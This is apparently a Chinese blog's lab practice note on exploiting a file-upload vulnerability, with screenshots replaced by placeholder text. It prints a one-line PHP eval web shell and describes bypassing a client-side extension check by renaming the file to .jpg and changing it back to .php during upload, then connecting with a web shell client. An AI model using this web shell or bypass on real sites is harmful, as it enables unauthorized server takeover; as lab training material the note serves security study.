1. 程式人生 > >文件上傳漏洞練習筆記(1)

文件上傳漏洞練習筆記(1)

post test 我們 ima cdc load 註意 分享圖片 解析

(1)打開網站
技術分享圖片
(2)我們註意到一個圖片上傳,先傳個jpg看看
技術分享圖片
(3)結果中可以看到Stored in: upload/Tulips.jpg
先記一下,這個是文件的保存路徑,後邊會用到。
下邊開始看看傳其他文件,php,或隨便一個後綴名文件,探究他的過濾能力
我寫了個php文件為1text.php

<?php @eval($_POST[‘c‘]);?>  

技術分享圖片

(4)我們發現不能上傳文件,可是又抓包抓不到,可以判定,在本地做了文件過濾
這時候,我們可以看看源代碼,發現有後綴名的校驗

技術分享圖片

(5)我們現在把1test.php改為1test.jpg

技術分享圖片

(6)可以發現文件是可以上傳成功的。
技術分享圖片

(7)但顯然,這個也不是我們要的結果,jpg格式不能直接解析

這個時候,我們想想是不是可以在上傳的時候將文件名改回php

技術分享圖片

(8)居然成功了,,我們菜刀連一下,。。網速太渣,就這樣把

技術分享圖片

文件上傳漏洞練習筆記(1)